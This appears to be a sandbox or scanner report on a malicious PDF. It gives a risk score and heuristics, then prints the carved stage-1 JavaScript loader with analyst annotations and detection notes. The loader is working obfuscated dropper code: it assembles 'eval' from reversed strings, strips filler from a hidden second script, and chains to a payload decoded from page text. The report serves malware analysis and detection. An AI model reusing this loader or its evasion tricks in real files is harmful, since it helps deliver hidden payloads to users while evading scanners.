MALICIOUS
106
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9954
Heuristics 3
-
Hex-obfuscated scripting name object — critical — PDF_OBFUSCATED_NAME_OBJECT: A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action — low — 1 related finding — PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream — low — PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0x1349 | 2325 bytes |

SHA-256: ca838ab153ea9de4fff1e74bdd0848fd720f71bc6fbee4425be234136cd19b41
Preview script — First 1,000 lines of the extracted script
// Stage-1 loader carved from /JS object 11 of the sample (see the artifact
// table above). Analyst annotations only; the script text itself is unchanged.
//
// What the visible code does:
//   1. Assembles API names piecewise ("lengt"+"h", "cha"+"rAt", reversed
//      "lave") so a string scan of the raw stream does not find "eval" or
//      "charAt".
//   2. Carries a second script in hCP, padded with the filler characters
//      9 | k 7, which the regex vUH strips at run time.
//   3. Recurses 51 times through dSJ.prototype.bOT, then passes the cleaned
//      stage-2 text to the property named "eval" on the object captured as
//      `this`.
// With the filler removed, the stage-2 text reads as code that collects the
// words of the current page via getPageNumWords / getPageNthWord, parses them
// as hex pairs, XORs each byte with 234, rebuilds the result through app.eval,
// splits off a 332-character tail that it stores on the document, and
// evaluates the remainder — i.e. the real payload lives in the PDF's page
// text, not in this stream.
// Detection notes: the stream is already flagged by the hex-escaped
// /JavaScript name heuristic above; inside the script the tell-tales are the
// reversed "lave" / "epytotorp" literals, the filler-stripping regex, and the
// getPageNthWord -> eval chain in decoded stage 2. The script depends on the
// Acrobat host (`app`, document-level `this`); outside Acrobat the assignment
// to app.rOD throws inside the try and app.alert in the catch throws again,
// so it cannot simply be replayed in a generic JS engine.
// `f` is declared null here and rebound near the end of the try block; bOT
// recurses through the global `f`, so that assignment order matters.
var f = null;
try {
// vKB -> "length". lKH and pUL are joined into "charAt" inside app.rOD below.
var vKB=new String("lengt"+"h");
var lKH="rA"+"t";
var pUL=String("cha");
// NOTE(review): in an Acrobat document-level script `this` is the Doc object
// — confirm in a sandbox; stage 2 later calls getPageNumWords on this.x.
var zOD=this;
// Recursion threshold (50), step (1) and start index (0) used by bOT.
var vIL=50;
var tSD=1;
var bWP=0;
// Filler characters interleaved in hCP; every match is deleted below.
var vUH=/[9\|k7]/g;
// Trivial holder constructor: x is the object stage 2 will run against.
function dSJ(lEZ){
this.x=lEZ;
};
// Stage-2 source with filler characters 9 | k 7 interleaved (see vUH).
var hCP="va|r9 9c|XkM|T7=9tkh7iks7.kxk;7z7=9\'9g7e7t|P7akg|e7N|\'9;9hkQ|Zk=|zk+|\'|tkh7W9o|r|d|\'7;|n|AkN|=9zk+k\'7u7mkW9o7rkd7s9\'k;9p9W7J9=9\'9p|akg9e9N9u|m|\'7;9pkO|V| 9=k 92k374k 7;kjkW7Zk=9\'|\'|;7o7X9CkRk=|\'7j9o9ikn7\'k;7j9O9Jk=|\'|\'9;7b9W|P7=90|;9lkAkR|=|Skt|r7iknkg7;7tkG9X7=|\'|sku|b7s|tkr9\'7;|rkA|R|=|\'7e7v9akl|\'|;9v7K|Bk=7\'klke|n|gkt9h7\'7;|f|I|N|=9\'k\\7\\|xk\'k;kvkQ|R9=9\'9tko|S7tkr9i9n9g|\'7;9rkQkZ9=k\'7p|a7r9s|ekIkn7t7\'7;|lkO7P|=9\'kf9r7o|m9C|h7a9r|C7o|dke|\'k;kz7UkP7=9\'kc7h|a9r|C9o9d|e9A9t|\'9;7t7S9D9=747/94|;9xkQ9Bk=k1|+k4|;9z7EkB9=72k070k+k595|;|zkO9D7=7\'|d|o|ck\'|;|t7M9Z7=93k3k2|;kl7W7Hk=|[k]7;|fkC9V9=|\'7\'9;|r9G9PkMk=k1k6k;7j7K7H|=|29;7t|M|R|=k4k;7p|Y9Vk=|c9X9M9T7[9nkA|N9]k(|c9X7M9T9[|p7W|J|]9)|;kf9o9rk(9z7I|R7=7b|W7Pk;9z9I7R9<9 |pkY7Vk;7 7z9I9R9+|+9)k{9vka7r| |xkM|F9=|ckX9MkT7[9h9Q7Zk]k(9ckXkMkTk[7pkWkJ9]7,7z9IkR9,|t7rku7e|)7;7j9O9J9=9[7j9O7Jk,7xkM|Fk]9[7o|X|C9R|]9(|jkWkZk)7;9;7}7fko7r|(|zkI|R9=90|;kz|I7Rk |<k |j9O|J9[9vkK|Bk]9;| |z|IkR7+7=9j9K9H9)k{|j7OkJ|C|=kj|O9J|[9t7GkX7]k(|z|I|R9,9jkK|Hk)7;kf9AkX9=|pkakrks7ekI7n|t9(|j7O|J9C|,7rkGkPkMk)k;7fkI|V7=|fkAkX9^kp9O9Vk;9d7Y7D9=7f|I7V|.7t|o|S|t9r|ikn|g|(7rkG|P|M|)9;|d7Y7D7=k(9d9Y9D9[7v9K9B7]|=k=kt7S9D|)7 |?9 |\'|07\'7 9+k 9dkY|D| 9:7 9d7Y7D9;7l9WkHk.9p|u9s7h7(|d7Y|D9)9;|}kt|r9y| |{7f7CkV|=7n7e9w| 7S9t9rki9nkg|(7f|I9N| 7+| 9l7W9H7[9o9X7C9Rk]|(kf7I9N9)9)9;ka9p7pk[kr|A7Rk]k(|\'|f|CkV|=9\"|\'k+kf9CkV9+9\'k\"7;7\'7)k;9c7X9MkT|.9vkW|B9=9(kf|C|Vk[kt9G|X7]k(9f9CkV9[kv|K7B7]k-7t9MkZk)7)k;9c9X9M|T7.|r9Q|T9=k(7f7C|V|[7t7GkX|]9(kbkWkP|,7f9C|V7[|vkK9B9]|-7t7M7Z7)7)9;kr|Q7L|(k)|;7}9 kc9a7tkc|h9(kn|IkN7)9{|ikf9(7ckX|M|T9.9r7Q|T|)k{|tkrky| 7{ka7p|p7[7r9A|R7]9(|c9X|M|T9.|r9QkT|)|;9}7 9ckaktkc|hk(7nkIkN|)|{k}7}| |e7l|s7e| k{9}9}9";
// String reversal helper hung off the Acrobat `app` object: walks charAt from
// index length down to 0 (charAt(length) yields "" so nothing is lost).
// nCB and zIR are implicit globals (no var).
app.rOD=function(nOV){
nCB='';
var dMZ = pUL + lKH;
for(zIR=nOV[vKB];zIR >= 0;zIR--){
nCB+=nOV[dMZ](zIR);
}
return nCB;
}
var rOD=app.rOD;
// rAR -> "eval" (reversed "lave"); the literal never appears in the stream.
rAR=rOD(String("lav"+"e"));
// tYR -> "prototype"; assigned but not referenced anywhere in this stage.
tYR = app.rOD('epytotorp');
// Strip the filler; from here on hCP is plain stage-2 source.
hCP=hCP.replace(vUH, '');
dSJ.prototype={
// Recurses through the global f until pOJ exceeds vIL (50), then invokes
// this.x["eval"] on the cleaned hCP. The 51-deep recursion has no functional
// purpose; plausibly an anti-emulation / delay trick — unconfirmed.
bOT : function(pOJ){
if(pOJ > vIL){
this.x[rAR](hCP);
} else {
f.bOT(pOJ+tSD);
}
},
};
// Rebind f to a holder wrapping the captured document object, then start the
// recursion at index 0.
var f=new dSJ(zOD);
f.bOT(bWP);
// Any failure surfaces as an Acrobat alert showing the exception; note the
// catch parameter reuses the name fCV that stage 2 also assigns.
} catch(fCV){
app.alert(fCV);
}
|
|||